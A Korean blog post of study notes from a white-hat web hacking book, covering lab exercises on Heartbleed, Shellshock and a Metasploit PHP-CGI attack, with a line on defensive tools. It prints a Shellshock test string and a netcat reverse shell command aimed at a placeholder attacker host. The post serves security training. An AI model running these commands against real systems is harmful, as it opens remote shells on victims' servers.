하트블리드 취약점 공격 실습
- 하트블리드 취약점을 이용하면 공격자는 웹 서버 호스트의 메모리를 읽을 수 있어 사용자의 로그인 정보 및 그 밖에 노출되면 안되는 민감한 정보들을 탈취할 수 있음
- 앞에 https와 8443 포트 번호붙이고 접속
- 터미널에서 하트블리드 파일 실행시키면 id/패스워드가 보임
쉘쇼크 취약점 공격과 리버스 쉘 실습
- 쉘쇼크는 bash 쉘의 취약점
env x=’() { :;}; echo vulnerable’ bash -c ‘echo this is test’ |
- 쉘쇼크 취약점이 있는지 판단할 수 있는 명령문, x 환경 변수에 쉘쇼크 공격 패턴과 명령어를 지정한 뒤 bash 쉘을 실행하여 지정한 명령어가실행되는지 확인
- 쉘쇼크에 취약하지 않은 경우 DANGER 표시X
nc <공격자 호스트 ip 주소> <포트번호> -e /bin/bash |
- 리버스 쉘을 생성하는 명령어, 공격자의 호스트가 서버가 됨
- 레퍼러 헤더를 수정 및 전송하면 접속이 들어온 것을 확인할 수 있다
- 쉘쇼크 공격은 명령어 실행이 가능한 공격, 쉘을 획득하는 방법은 바인드 쉘과 리버스 쉘이 있는데 접속 방향에 따라 구분
- 바인드 쉘은 공격자가 서버 쪽에 리스닝 포트를 열어 기다리도로 만든 후, 공격자 클라이언트에서 서버로 접속하여 쉘을 획득하는 공격
- 리버스 쉘은 공격 대상 쪽에서 공격자의 호스트로 접속하도록 만들어 리버스, 즉 역방향으로 쉘을 생성하는 공격 기법(방화벽 우회)
메타스플로잇을 활용한 PHP-CGI 취약점 공격
1 소스코드 노출
2 메타스플로잇을 이용한 공격
- 쉘 획득(버전달라서 책이랑 다르게 나오는 것으로 추정)
알려진 취약점 공격 대응
- OWASP Dependency-Check, IoTcube 등 이용
해당 포스팅은 '화이트해커를 위한 웹 해킹의 기술' 책 내용을 바탕으로 작성되었습니다.
'보안' 카테고리의 다른 글
Chapter 18. 실전 모의해킹 (1) | 2019.03.14 |
---|---|
Chapter 17. 자바 역직렬화 취약점 공격 (0) | 2019.03.14 |
Chapter 15. XXE 공격 (0) | 2019.03.14 |
Chapter 14. 접근 통제 취약점 공격 (0) | 2019.03.05 |
Chapter 13. 민감한 데이터 노출 (0) | 2019.03.04 |
댓글